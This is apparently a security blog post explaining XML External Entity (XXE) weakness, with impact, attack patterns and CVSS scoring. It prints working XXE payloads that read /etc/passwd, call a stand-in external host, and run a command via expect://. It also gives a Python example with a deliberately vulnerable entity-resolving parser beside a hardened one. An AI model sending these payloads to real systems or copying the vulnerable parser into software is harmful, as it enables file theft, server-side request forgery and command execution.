Improper Restriction of XML External Entity Reference (‘XXE’) [CWE-611] — The Hacktivists

The Hacktivists
2 min read, Mar 13, 2021

Improper Restriction of XML External Entity Reference, or XXE, describes the case where an XML parser is configured (or left at its defaults) to resolve external entities, which lets an attacker who controls the input make the parser read local files or fetch remote resources on the application's behalf.

Table of Contents
1. Description
2. Potential impact
3. Attack patterns
4. Affected software
5. Severity and CVSS Scoring

1. Description
………………………………

The weakness arises when the parser processes an XML document whose DTD declares entities with URIs that resolve to resources outside the intended location. If the application does not disable external entity resolution (or at least restrict which URIs may be fetched), the attacker can declare an entity pointing at an arbitrary local or remote file, reference it from the document body, and have the parser pull the content in; whatever the application then does with the parsed data (echo it in a response, log it, write it to a file) determines how the content leaks back to the attacker.

The XXE attack is built on the XML language's ability to declare arbitrary entities in the Document Type Definition (DTD) and on the parser's willingness to dereference the SYSTEM identifier of an external entity, which, depending on the URI schemes the resolver supports, can mean reading files, making network requests, or in some environments executing commands.

Below is an example of an XML document that, when processed by a parser that resolves external entities, may return the contents of the local “/etc/passwd” file (the &xxe; reference in the body is what actually triggers the read):

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<test>&xxe;</test>

Another example shows how to make the server request an external resource using the same weakness (this is also the basis for SSRF and internal port scanning through the parser):

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "http://www.malicious-website.com/xxe.txt" >]>
<test>&xxe;</test>

The attacker may also be able to execute arbitrary commands on the system by leveraging third-party software, e.g. the PHP “expect” extension, whose expect:// stream wrapper runs the command named in the URI. The PoC below will list the files and directories in the current application folder by running the “ls” command:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [ <!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "expect://ls" >]>
<test>&xxe;</test>
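
As an added example (not code from the original post), the three payload shapes above are fed to two configurations of Python's expat parser: one that dereferences whatever SYSTEM identifier the document names, which is what a vulnerable resolver does, and one that refuses any DOCTYPE so no entity can be declared at all. Instead of reading the real /etc/passwd it writes a constructed stand-in into a temporary directory and only resolves that file:// payload; the http:// and expect:// payloads are only shown being rejected by the hardened parser, so nothing touches the network. The names xxe_payload, parse_resolving_entities, parse_untrusted, XXEBlocked and demo are this example's own, and file:// URIs are assumed to be POSIX paths.

```python
"""Added example: XXE payloads against an entity-resolving expat parser
and against a hardened one. Not code from the original page."""
import os
import tempfile
import urllib.request
import xml.parsers.expat as expat


class XXEBlocked(Exception):
    """Raised by the hardened parser when a document tries to use a DTD."""


def xxe_payload(uri):
    """Build the payload shape used on the page, with a body that references &xxe;."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        '<!DOCTYPE test [\n'
        '<!ELEMENT test ANY >\n'
        f'<!ENTITY xxe SYSTEM "{uri}" >]>\n'
        '<test>&xxe;</test>'
    )


def parse_resolving_entities(xml_text):
    """VULNERABLE: resolves external entities by fetching the URI the document names.

    Returns the character data of the parsed document, which now includes
    the content of the referenced resource.
    """
    parser = expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append

    def fetch_external_entity(context, base, system_id, public_id):
        # The bug: dereference an attacker-chosen URI (file://, http://, ...)
        # and splice the result into the document as entity content.
        with urllib.request.urlopen(system_id) as resp:
            data = resp.read()
        child = parser.ExternalEntityParserCreate(context)
        child.CharacterDataHandler = chunks.append
        child.Parse(data, True)
        return 1  # non-zero tells expat to continue parsing

    parser.ExternalEntityRefHandler = fetch_external_entity
    parser.Parse(xml_text, True)
    return "".join(chunks)


def parse_untrusted(xml_text):
    """HARDENED: refuse any DOCTYPE, so no entity declaration can exist."""
    parser = expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise XXEBlocked(f"DOCTYPE not allowed (root {name!r})")

    def reject_external_entity(context, base, system_id, public_id):
        raise XXEBlocked(f"external entity {system_id!r} not resolved")

    parser.StartDoctypeDeclHandler = reject_doctype
    # Redundant once DTDs are refused, but makes the intent explicit.
    parser.ExternalEntityRefHandler = reject_external_entity
    parser.Parse(xml_text, True)
    return "".join(chunks)


def demo():
    """Return (leaked_text, blocked_flags) for a constructed secret file."""
    with tempfile.TemporaryDirectory() as d:
        secret_path = os.path.join(d, "passwd")  # stand-in for /etc/passwd
        with open(secret_path, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed content
        file_uri = "file://" + secret_path
        leaked = parse_resolving_entities(xxe_payload(file_uri))
        blocked = []
        for uri in (file_uri,
                    "http://www.malicious-website.com/xxe.txt",
                    "expect://ls"):
            try:
                parse_untrusted(xxe_payload(uri))
                blocked.append(False)
            except XXEBlocked:
                blocked.append(True)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable parser leaked:", leaked.strip())
    print("hardened parser blocked all three payloads:", all(blocked))
```

Refusing the DOCTYPE at the parser level is more robust than scanning the raw bytes for the string “<!DOCTYPE”, because it is the parser's own tokenizer that decides what counts as a DTD. Where a library cannot switch DTDs off, the equivalent fix is to disable external entity resolution (for example resolve_entities=False on lxml's XMLParser, or the disallow-doctype-decl feature on Java's DocumentBuilderFactory).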

2. Potential impact
………………………………

XXE is a very dangerous vulnerability. Depending on the application's implementation and environment, the impact ranges from local/remote file disclosure (and, with an out-of-band channel, exfiltration even when the parsed content is never echoed back) to remote command execution and full system compromise.

This vulnerability can also be used to make the server issue requests on the attacker's behalf, which allows port scans of the vulnerable host or of servers on the internal network, and, since the same DTD machinery permits nested entity expansion, to exhaust parser memory or CPU in a denial-of-service attack.

3. Attack patterns
………………………………

This vulnerability is associated with the following attack patterns:

❏ CAPEC-201: XML Entity Blowup
❏ CAPEC-221: XML External Entities
❏ CAPEC-231: XML Oversized Payloads

4. Affected software
………………………………

Any software that parses attacker-supplied XML with a parser whose external entity resolution is enabled can be affected; several widely used XML libraries historically resolved external entities by default, so the issue is not limited to applications that deliberately use DTDs.

5. Severity and CVSS Scoring
……………………………………..

This is an extremely dangerous vulnerability. It may allow an attacker to fully compromise a vulnerable system and is most likely scored as Critical. The vector below carries a base score of 9.8; the appended temporal metrics (E:U/RL:O/RC:C) bring the temporal score down to 8.5:
9.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C] — Critical

Credits: https://www.immuniweb.com/
